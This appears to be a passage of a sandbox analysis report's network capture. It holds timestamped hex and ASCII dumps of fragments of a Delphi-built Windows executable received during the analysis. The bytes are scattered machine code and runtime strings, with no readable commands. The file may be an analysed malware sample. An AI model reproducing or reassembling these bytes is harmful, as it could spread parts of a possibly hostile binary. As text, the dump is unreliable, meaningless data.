                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16650INData Raw: fe ff ff e8 9b fe ff ff e8 96 fe ff ff e8 91 fe ff ff e8 8c fe ff ff e8 87 fe ff ff e8 82 fe ff ff e8 7d fe ff ff e8 78 fe ff ff e8 73 fe ff ff e8 6e fe ff ff e8 69 fe ff ff e8 64 fe ff ff e8 5f fe ff ff e8 5a fe ff ff e8 55 fe ff ff e8 50 fe ff ff e8 4b fe ff ff e8 46 fe ff ff e8 41 fe ff ff e8 3c fe ff ff e8 37 fe ff ff e8 32 fe ff ff e8 2d fe ff ff e8 28 fe ff ff e8 23 fe ff ff e8 1e fe ff ff e8 19 fe ff ff e8 14 fe ff ff e8 0f fe ff ff e8 0a fe ff ff e8 05 fe ff ff e8 00 fe ff ff e8 fb fd ff ff e8 f6 fd ff ff e8 f1 fd ff ff e8 ec fd ff ff e8 e7 fd ff ff e8 e2 fd ff ff e8 dd fd ff ff e8 d8 fd ff ff e8 d3 fd ff ff e8 ce fd ff ff e8 c9 fd ff ff e8 c4 fd ff ff e8 bf fd ff ff e8 ba fd ff ff e8 b5 fd ff ff e8 b0 fd ff ff e8 ab fd ff ff e8 a6 fd ff ff e8 a1
                                                                                                                                                                                                                                    Data Ascii: }xsnid_ZUPKFA<72-(#
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16651INData Raw: 50 6a 01 ff 15 40 e6 4b 00 8b d8 85 db 75 0b 8b 45 b4 50 e8 6e f8 ff ff 8b d8 85 db 75 4b e8 5b f8 ff ff 89 45 c8 83 3d 44 e6 4b 00 00 74 0e 8d 45 a8 50 6a 03 ff 15 44 e6 4b 00 8b d8 85 db 75 28 a1 88 7c 4b 00 89 45 f4 8d 55 a8 89 55 f4 8d 4d f4 51 6a 01 6a 00 68 7e 00 6d c0 e8 2d f8 ff ff 8b 45 c4 e9 21 01 00 00 53 8b 55 d4 52 e8 cb f7 ff ff 3b d8 74 33 83 7e 18 00 74 33 6a 08 6a 40 e8 d8 f7 ff ff 89 45 f0 85 c0 74 23 8b c6 8b 55 f0 89 42 04 8b 4d f0 a1 3c 7c 4b 00 89 01 8b 55 f0 89 15 3c 7c 4b 00 eb 06 53 e8 9e f7 ff ff 89 5d c0 83 3d 40 e6 4b 00 00 74 0e 8d 4d a8 51 6a 02 ff 15 40 e6 4b 00 8b f8 85 ff 75 4b 83 7e 14 00 74 39 83 7e 1c 00 74 33 8b 43 3c 03 c3 81 38 50 45 00 00 75 26 8b 50 08 3b 55 e8 75 1e 8b 48 34 3b cb 0f 94 c1 83 e1 01 84 c9 74 0f 8b
                                                                                                                                                                                                                                    Data Ascii: Pj@KuEPnuK[E=DKtEPjDKu(|KEUUMQjjh~m-E!SUR;t3~t3jj@Et#UBM<|KU<|KS]=@KtMQj@KuK~t9~t3C<8PEu&P;UuH4;t
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16653INData Raw: 63 74 69 6f 6e 01 00 00 00 00 01 00 00 00 b0 d8 40 00 0d 46 72 6f 6d 42 65 67 69 6e 6e 69 6e 67 07 46 72 6f 6d 45 6e 64 0c 53 79 73 74 65 6d 2e 54 79 70 65 73 02 00 00 00 f8 d8 40 00 03 0b 54 57 61 69 74 52 65 73 75 6c 74 01 00 00 00 00 04 00 00 00 f4 d8 40 00 0a 77 72 53 69 67 6e 61 6c 65 64 09 77 72 54 69 6d 65 6f 75 74 0b 77 72 41 62 61 6e 64 6f 6e 65 64 07 77 72 45 72 72 6f 72 0e 77 72 49 4f 43 6f 6d 70 6c 65 74 69 6f 6e 0c 53 79 73 74 65 6d 2e 54 79 70 65 73 02 00 00 00 00 60 d9 40 00 03 1b 54 4d 75 6c 74 69 57 61 69 74 45 76 65 6e 74 2e 54 57 61 69 74 65 72 46 6c 61 67 01 00 00 00 00 01 00 00 00 5c d9 40 00 07 57 61 69 74 69 6e 67 07 57 61 69 74 41 6c 6c 0c 53 79 73 74 65 6d 2e 54 79 70 65 73 02 00 00 00 00 b0 d9 40 00 06 1c 54 4d 75 6c 74 69 57 61
                                                                                                                                                                                                                                    Data Ascii: ction@FromBeginningFromEndSystem.Types@TWaitResult@wrSignaledwrTimeoutwrAbandonedwrErrorwrIOCompletionSystem.Types`@TMultiWaitEvent.TWaiterFlag\@WaitingWaitAllSystem.Types@TMultiWa
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16654INData Raw: 00 06 45 76 65 6e 74 73 02 00 00 e4 10 40 00 02 00 07 54 69 6d 65 6f 75 74 02 00 02 00 4c 00 18 7c 4b 00 0a 57 61 69 74 46 6f 72 41 6e 79 03 00 f4 d8 40 00 0c 00 03 16 cc de 40 00 00 00 06 45 76 65 6e 74 73 02 00 20 9c 10 40 00 02 00 05 49 6e 64 65 78 02 00 00 e4 10 40 00 08 00 07 54 69 6d 65 6f 75 74 02 00 02 00 4c 00 18 7c 4b 00 0a 57 61 69 74 46 6f 72 41 6e 79 03 00 f4 d8 40 00 0c 00 03 16 cc de 40 00 00 00 06 45 76 65 6e 74 73 02 00 28 cc de 40 00 02 00 05 45 76 65 6e 74 02 00 00 e4 10 40 00 08 00 07 54 69 6d 65 6f 75 74 02 00 02 00 00 00 00 d0 de 40 00 07 0f 54 4d 75 6c 74 69 57 61 69 74 45 76 65 6e 74 5c dc 40 00 88 1f 40 00 00 00 0c 53 79 73 74 65 6d 2e 54 79 70 65 73 00 00 00 00 02 00 00 00 04 df 40 00 0f 0c 49 41 73 79 6e 63 52 65 73 75 6c 74 b0
                                                                                                                                                                                                                                    Data Ascii: Events@TimeoutL|KWaitForAny@@Events @Index@TimeoutL|KWaitForAny@@Events(@Event@Timeout@TMultiWaitEvent\@@System.Types@IAsyncResult
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16655INData Raw: 00 8b c0 ff 25 c0 23 4c 00 8b c0 ff 25 04 23 4c 00 8b c0 ff 25 a0 23 4c 00 8b c0 ff 25 6c 23 4c 00 8b c0 ff 25 e4 23 4c 00 8b c0 ff 25 f0 23 4c 00 8b c0 ff 25 c8 23 4c 00 8b c0 ff 25 0c 23 4c 00 8b c0 ff 25 08 23 4c 00 8b c0 ff 25 88 23 4c 00 8b c0 ff 25 8c 23 4c 00 8b c0 ff 25 3c 24 4c 00 8b c0 ff 25 10 24 4c 00 8b c0 ff 25 40 24 4c 00 8b c0 ff 25 98 24 4c 00 8b c0 ff 25 90 24 4c 00 8b c0 ff 25 94 24 4c 00 8b c0 ff 25 ac 24 4c 00 8b c0 ff 25 a8 24 4c 00 8b c0 ff 25 b0 24 4c 00 8b c0 ff 25 c8 24 4c 00 8b c0 ff 25 c4 24 4c 00 8b c0 ff 25 dc 24 4c 00 8b c0 ff 25 d8 24 4c 00 8b c0 ff 25 b8 24 4c 00 8b c0 ff 25 d4 24 4c 00 8b c0 ff 25 c0 24 4c 00 8b c0 ff 25 d0 24 4c 00 8b c0 ff 25 b4 24 4c 00 8b c0 ff 25 a4 24 4c 00 8b c0 ff 25 a0 24 4c 00 8b c0 55 8b ec 51
                                                                                                                                                                                                                                    Data Ascii: %#L%#L%#L%l#L%#L%#L%#L%#L%#L%#L%#L%<$L%$L%@$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$L%$LUQ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16659INData Raw: 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d 5d
                                                                                                                                                                                                                                    Data Ascii: ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16664INData Raw: 0d 18 0d 18 0d 18 0d 18 0d 18 0d 18 0d 18 0d 18 0d 18 0d 18 0d 18 0d c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c6 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 29 10 00 05 00 05 f7 06 b5 01 2a 0d 02 03 82 0d c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 59 0d 8d 03 ef 0a c4 01 c4 01 c4 01 c4 01 c4 01 29 0e 00 05 c4 01 c4 01 c4 01 c4 01 27 0e c4 01 c4 01 c0 04 00 05 00 05 de 0d 8b 13 64 07 8b 13 a0 08 ca 0a c0 0a 81 05 02 08 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 89 12 73 05 30 00 40 00 50 00 60 00 69 0d d6 0d a8 07 c4 01 8d 04 c4 01 c5 01 a0 01 a8 01 05 0f 73 0f 48 03 c4 01 4d 03 79 0d c6 01 c6 01 00 05 00 05 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 28 10 85 14 41 05 41 05 3e 09 08 0b 08 0b 08 0b b0 0d 99 15 13 16 69 0b 00 05 00 05 08 01 08 01 d2 08 00 05 00 05 00 05 00 05
                                                                                                                                                                                                                                    Data Ascii: )*Y)'ds0@P`isHMy(AA>i
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16665INData Raw: 00 05 00 05 00 05 00 05 00 05 4b 03 c4 01 08 08 99 05 d2 10 0f 14 44 05 da 0d c4 01 89 13 60 09 99 12 00 05 00 05 00 05 00 05 7d 0d c4 01 c4 01 a9 12 c5 12 e5 04 7e 0d c4 01 d5 12 fa 12 e5 04 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 c4 01 0a 13 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 41 05 96 14 07 01 1d 16 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 29 10 00 05 00 05 00 05 00 05 00 05 00 05 08 0b 08 0b 08 0b 08 0b 08 0b 08 0b 09 0b d3 10 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 01 c4 04 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 c4 01 c4 01 c5 01 b6 11 00 05 00 05 00 05 00 05 00 05 00 05 00
                                                                                                                                                                                                                                    Data Ascii: KD`}~A)
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16669INData Raw: 0a 0a 02 0a 0a 0a 0c 02 02 0c 0c 09 05 02 02 02 02 02 15 15 15 15 0f 15 15 05 05 05 05 05 05 02 05 02 02 02 02 02 05 02 02 11 15 16 15 15 15 15 15 15 15 15 15 15 15 15 15 02 02 02 02 02 02 02 02 02 1d 15 15 15 1a 06 07 0e 16 12 16 12 16 12 16 12 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 19 19 19 16 12 02 11 06 06 06 06 06 1a 1a 0e 0e 0e 06 07 15 1a 1a 0c 0c 0c 1a 02 02 02 02 02 02 02 02 02 02 07 07 07 07 07 07 07 02 02 0c 0c 18 18 06 06 07 07 07 07 07 07 1a 1a 1a 07 0a 0c 0a 07 07 07 07 07 07 07 07 07 07 07 07 07 0f 0f 0f 0f 0f 0f 02 02 02 15 07 07 07 07 07 07 07 07 07 07 07 15 06 06 06 07 0c 07 07 0c 0c 0c 0c 0c 0c 0c 0c 0c 07 02 02 07 07 07 07 07 06 07 07 07 07 07 07 07 07 07 07 07 07 06 15 15 15 02 15 15 15 15 11 16 12 16 12 16 12 15 15 16 12 15 15 15 15 10 10 10
                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16673INData Raw: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16677INData Raw: 01 60 01 00 00 00 00 00 00 00 00 70 01 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b3 00 90 01 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 c0 01 00 00 d0 01 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a 01 00 00 00 02 10 02 00 00 00 00 9a 01 00 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: `p 0@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16681INData Raw: 5b c3 81 fb ff 00 00 00 77 12 a1 88 e6 4b 00 0f b6 04 18 04 fb 2c 05 0f 92 c0 eb 0e 8b c3 e8 81 ff ff ff 04 fb 2c 05 0f 92 c0 5b c3 53 56 8b d8 0f b7 33 81 fe ff 00 00 00 77 1c a1 88 e6 4b 00 0f b6 04 30 04 fb 2c 05 72 08 2c 03 74 04 33 c0 eb 1c b0 01 5e 5b c3 8b c6 e8 46 ff ff ff 04 fb 2c 05 72 08 2c 03 74 04 33 c0 eb 02 b0 01 5e 5b c3 8d 40 00 53 56 8b d8 0f b7 33 83 fe 7f 77 0c 83 c6 d0 83 ee 0a 0f 92 c0 5e 5b c3 81 fe ff 00 00 00 77 12 a1 88 e6 4b 00 0f b6 04 30 04 f3 2c 03 0f 92 c0 eb 0e 8b c6 e8 f7 fe ff ff 04 f3 2c 03 0f 92 c0 5e 5b c3 90 ff 05 78 e6 4b 00 c3 90 1a 00 00 00 cc 7d 4b 00 58 a5 4b 00 02 00 00 00 c4 7d 4b 00 a0 a7 4b 00 02 00 00 00 bc 7d 4b 00 f8 a5 4b 00 02 00 00 00 b4 7d 4b 00 34 a5 4b 00 02 00 00 00 ac 7d 4b 00 60 a6 4b 00 02 00 00
                                                                                                                                                                                                                                    Data Ascii: [wK,,[SV3wK0,r,t3^[F,r,t3^[@SV3w^[wK0,,^[xK}KXK}KK}KK}K4K}K`K
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16685INData Raw: 74 65 6d 2e 53 79 73 55 74 69 6c 73 00 00 00 00 02 00 00 00 00 00 00 8c 5b 41 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 5b 41 00 00 00 00 00 94 5b 41 00 00 00 00 00 9a 5b 41 00 20 00 00 00 6c 5a 41 00 b0 5d 40 00 b8 5d 40 00 d8 f4 41 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 08 f4 41 00 80 f4 41 00 4c f4 41 00 00 00 00 00 02 00 12 45 45 78 74 65 72 6e 61 6c 45 78 63 65 70 74 69 6f 6e 00 00 00 b4 5b 41 00 07 12 45 45 78 74 65 72 6e 61 6c 45 78 63 65 70 74 69 6f 6e 8c 5b 41 00 00 5b 41 00 00 00 0f 53 79 73 74 65 6d 2e 53 79 73 55 74 69 6c 73 00 00 00 00 02 00 00 00 00 00 44 5c 41 00 00 00 00 00 00 00 00 00 00 00 00 00 60 5c 41 00 00 00 00 00 4c 5c 41 00 00 00 00 00 52 5c 41 00 20 00 00 00 6c 5a 41 00 b0 5d 40 00
                                                                                                                                                                                                                                    Data Ascii: tem.SysUtils[A[A[A[A lZA]@]@A`@,`@0`@4`@(`@\@\@AALAEExternalException[AEExternalException[A[ASystem.SysUtilsD\A`\AL\AR\A lZA]@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16689INData Raw: 41 00 80 f4 41 00 4c f4 41 00 00 00 00 00 02 00 15 45 4d 6f 6e 69 74 6f 72 4c 6f 63 6b 45 78 63 65 70 74 69 6f 6e cc 6b 41 00 07 15 45 4d 6f 6e 69 74 6f 72 4c 6f 63 6b 45 78 63 65 70 74 69 6f 6e a4 6b 41 00 1c 6b 41 00 00 00 0f 53 79 73 74 65 6d 2e 53 79 73 55 74 69 6c 73 00 00 00 00 02 00 00 00 00 00 00 60 6c 41 00 00 00 00 00 00 00 00 00 00 00 00 00 90 6c 41 00 00 00 00 00 68 6c 41 00 00 00 00 00 6e 6c 41 00 1c 00 00 00 ac 6a 41 00 b0 5d 40 00 b8 5d 40 00 d8 f4 41 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 08 f4 41 00 80 f4 41 00 4c f4 41 00 00 00 00 00 02 00 1a 45 4e 6f 4d 6f 6e 69 74 6f 72 53 75 70 70 6f 72 74 45 78 63 65 70 74 69 6f 6e 00 00 00 90 6c 41 00 07 1a 45 4e 6f 4d 6f 6e 69 74 6f 72 53 75 70 70 6f
                                                                                                                                                                                                                                    Data Ascii: AALAEMonitorLockExceptionkAEMonitorLockExceptionkAkASystem.SysUtils`lAlAhlAnlAjA]@]@A`@,`@0`@4`@(`@\@\@AALAENoMonitorSupportExceptionlAENoMonitorSuppo
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16694INData Raw: 41 00 42 00 f4 ff c0 87 41 00 42 00 f4 ff 28 88 41 00 42 00 f4 ff 90 88 41 00 42 00 f4 ff 0f 89 41 00 42 00 f4 ff 8e 89 41 00 41 00 f4 ff bd 89 41 00 41 00 f4 ff f0 89 41 00 ca 00 08 00 32 8a 41 00 ca 00 09 00 74 8a 41 00 ca 00 0a 00 aa 8a 41 00 42 00 f4 ff ed 8a 41 00 42 00 f4 ff 56 8b 41 00 42 00 f4 ff 0b 00 09 54 45 6e 63 6f 64 69 6e 67 25 00 a4 16 42 00 05 43 6c 6f 6e 65 03 00 9c 8b 41 00 08 00 01 08 9c 8b 41 00 00 00 04 53 65 6c 66 02 00 02 00 66 00 18 7c 4b 00 07 43 6f 6e 76 65 72 74 03 00 a4 31 40 00 14 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 0a 9c 8b 41 00 01 00 06 53 6f 75 72 63 65 02 00 0a 9c 8b 41 00 02 00 0b 44 65 73 74 69 6e 61 74 69 6f 6e 02 00 16 b4 10 40 00 10 00 05 42 79 74 65 73 02 00 40 a4 31 40 00 08 00 01 01 02 00 02 00 66 00
                                                                                                                                                                                                                                    Data Ascii: ABAB(ABABABAAAAA2AtAABABVABTEncoding%BCloneAASelff|KConvert1@SelfASourceADestination@Bytes@1@f
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16697INData Raw: dc 31 40 00 08 00 01 01 02 00 02 00 7f 00 18 7c 4b 00 08 47 65 74 43 68 61 72 73 03 00 9c 10 40 00 1c 00 06 08 9c 8b 41 00 00 00 04 53 65 6c 66 02 00 16 b4 10 40 00 01 00 05 42 79 74 65 73 02 00 00 9c 10 40 00 18 00 09 42 79 74 65 49 6e 64 65 78 02 00 00 9c 10 40 00 14 00 09 42 79 74 65 43 6f 75 6e 74 02 00 16 4c 10 40 00 10 00 05 43 68 61 72 73 02 00 00 9c 10 40 00 08 00 09 43 68 61 72 49 6e 64 65 78 02 00 02 00 7f 00 18 7c 4b 00 08 47 65 74 43 68 61 72 73 03 00 9c 10 40 00 14 00 06 08 9c 8b 41 00 00 00 04 53 65 6c 66 02 00 02 a4 31 40 00 01 00 05 42 79 74 65 73 02 00 00 9c 10 40 00 02 00 09 42 79 74 65 49 6e 64 65 78 02 00 00 9c 10 40 00 10 00 09 42 79 74 65 43 6f 75 6e 74 02 00 02 dc 31 40 00 0c 00 05 43 68 61 72 73 02 00 00 9c 10 40 00 08 00 09 43 68
                                                                                                                                                                                                                                    Data Ascii: 1@|KGetChars@ASelf@Bytes@ByteIndex@ByteCountL@Chars@CharIndex|KGetChars@ASelf1@Bytes@ByteIndex@ByteCount1@Chars@Ch
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16701INData Raw: 05 83 e8 04 8b 00 85 c0 75 04 b0 01 eb 28 8b 04 24 0f b7 00 66 89 44 24 06 8d 44 24 06 e8 51 b1 ff ff 84 c0 75 0c 66 83 7c 24 06 5f 74 04 33 c0 eb 02 b0 01 34 01 84 c0 0f 85 a9 00 00 00 80 7c 24 04 00 74 57 8b 04 24 85 c0 74 05 83 e8 04 8b 00 8b f8 83 ef 02 0f 8c 89 00 00 00 47 be 02 00 00 00 8b 04 24 0f b7 44 70 fe 66 89 44 24 08 8d 44 24 08 e8 43 b1 ff ff 84 c0 75 14 66 83 7c 24 08 5f 74 0c 66 83 7c 24 08 2e 74 04 33 c0 eb 02 b0 01 84 c0 74 51 46 4f 75 c8 eb 49 8b 04 24 85 c0 74 05 83 e8 04 8b 00 8b f8 83 ef 02 7c 36 47 be 02 00 00 00 8b 04 24 0f b7 44 70 fe 66 89 44 24 0a 8d 44 24 0a e8 f0 b0 ff ff 84 c0 75 0c 66 83 7c 24 0a 5f 74 04 33 c0 eb 02 b0 01 84 c0 74 06 46 4f 75 d0 b3 01 8b c3 83 c4 0c 5f 5e 5b c3 8d 40 00 53 56 57 55 8b e9 8b da 8b f8 81 ff
                                                                                                                                                                                                                                    Data Ascii: u($fD$D$Quf|$_t34|$tW$tG$DpfD$D$Cuf|$_tf|$.t3tQFOuI$t|6G$DpfD$D$uf|$_t3tFOu_^[@SVWU
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16705INData Raw: 8b 4d fc 8b d3 4a e8 73 fe ff ff 89 45 f4 8b c3 48 3b 45 f4 7e b8 8b c7 8b 55 f4 e8 b6 dc fe ff eb 10 8d 95 f4 df ff ff 8b c7 8b 4d f4 e8 e8 d1 fe ff 5f 5e 5b 8b e5 5d c2 08 00 8d 40 00 55 8b ec 53 56 33 c9 8b 5d 08 3b 43 fc 7d 10 8b 5d 08 66 83 7b fa 53 74 06 8b 45 08 8b 40 fc 8b 5d 08 83 7b f4 ff 74 45 8b 5d 08 8b 5b f4 8d 34 02 3b de 7e 38 8d 54 02 01 8b 45 08 8b 40 f4 2b c2 7c 2a 40 8b 5d 08 83 7b f0 00 75 04 b1 01 eb 1c 8b 55 08 8b 52 ec 66 c7 02 20 00 8b 55 08 83 42 ec 02 8b 55 08 83 6a f0 02 48 75 d7 8b c1 5e 5b 5d c3 90 55 8b ec 83 c4 f0 53 56 57 89 4d fc 8b da 8b f8 89 7d f4 85 ff 74 17 83 7d fc ff 75 0c 8b 45 f4 e8 9f d4 fe ff 8b f0 eb 07 8b 75 fc eb 02 33 f6 83 fb ff 7e 06 3b de 7d 02 8b f3 8b c6 03 c0 89 45 f8 85 ff 74 21 8b 45 f4 66 83 38 2d
                                                                                                                                                                                                                                    Data Ascii: MJsEH;E~UM_^[]@USV3];C}]f{StE@]{tE][4;~8TE@+|*@]{uURf UBUjHu^[]USVWM}t}uEu3~;}Et!Ef8-
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16709INData Raw: 46 08 89 c2 25 ff 7f 00 00 74 1e 3d ff 7f 00 00 75 22 66 f7 46 06 00 80 74 11 83 3e 00 75 09 81 7e 04 00 00 00 80 74 03 40 31 d2 c6 43 03 00 e9 cd 00 00 00 db 2e 2d ff 3f 00 00 69 c0 10 4d 00 00 c1 f8 10 40 89 45 f8 b8 12 00 00 00 2b 45 f8 d9 e1 53 8b 5d fc e8 b6 9f fe ff 5b d9 fc 8b 7d fc db af 90 91 4b 00 d8 d9 9b dd 7d f6 9b 66 f7 45 f6 00 41 74 09 da b7 9c 91 4b 00 ff 45 f8 df 75 ec 8d 7b 03 ba 09 00 00 00 9b 8a 44 2a eb 88 c4 c0 e8 04 80 e4 0f 66 05 30 30 66 ab 4a 75 eb 32 c0 aa 8b 7d f8 03 7d 08 79 07 31 c0 e9 77 ff ff ff 3b 7d 0c 72 03 8b 7d 0c 83 ff 12 73 27 80 7c 3b 03 35 72 25 c6 44 3b 03 00 4f 78 0d fe 44 3b 03 80 7c 3b 03 39 77 ed eb 1f 66 c7 43 03 31 00 ff 45 f8 eb 14 bf 12 00 00 00 c6 44 3b 03 00 4f 78 19 80 7c 3b 03 30 74 f1 66 8b 56 08 8b
                                                                                                                                                                                                                                    Data Ascii: F%t=u"fFt>u~t@1C.-?iM@E+ES][}K}fEAtKEu{D*f00fJu2}}y1w;}r}s'|;5r%D;OxD;|;9wfC1ED;Ox|;0tfV
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC16713INData Raw: 59 8b 45 08 50 55 8d 55 d4 8b 45 e4 e8 83 fb ff ff 59 8b 45 d4 e8 66 fa ff ff 59 e9 43 06 00 00 55 e8 c2 fa ff ff 59 55 e8 ef fa ff ff 59 8b 45 08 50 55 8d 55 d0 8b 45 e4 e8 d2 fc ff ff 59 8b 45 d0 e8 39 fa ff ff 59 e9 16 06 00 00 55 e8 95 fa ff ff 59 55 e8 c2 fa ff ff 59 8b 45 e4 48 83 e8 02 72 04 74 18 eb 36 8b 45 08 50 0f b7 45 fc 8b 55 e4 e8 24 fa ff ff 59 e9 e5 05 00 00 8b 45 08 50 0f b7 45 fc 8b 55 08 8b 92 30 fd ff ff 8b 44 82 20 e8 e8 f9 ff ff 59 e9 c5 05 00 00 8b 45 08 50 0f b7 45 fc 8b 55 08 8b 92 30 fd ff ff 8b 44 82 50 e8 c8 f9 ff ff 59 e9 a5 05 00 00 55 e8 24 fa ff ff 59 8b 45 e4 48 83 e8 02 72 11 74 2c 48 74 59 48 0f 84 82 00 00 00 e9 98 00 00 00 55 e8 37 fa ff ff 59 8b 45 08 50 0f b7 45 fa 8b 55 e4 e8 a6 f9 ff ff 59 e9 67 05 00 00 8b 45 08
                                                                                                                                                                                                                                    Data Ascii: YEPUUEYEfYCUYUYEPUUEYE9YUYUYEHrt6EPEU$YEPEU0D YEPEU0DPYU$YEHrt,HtYHU7YEPEUYgE
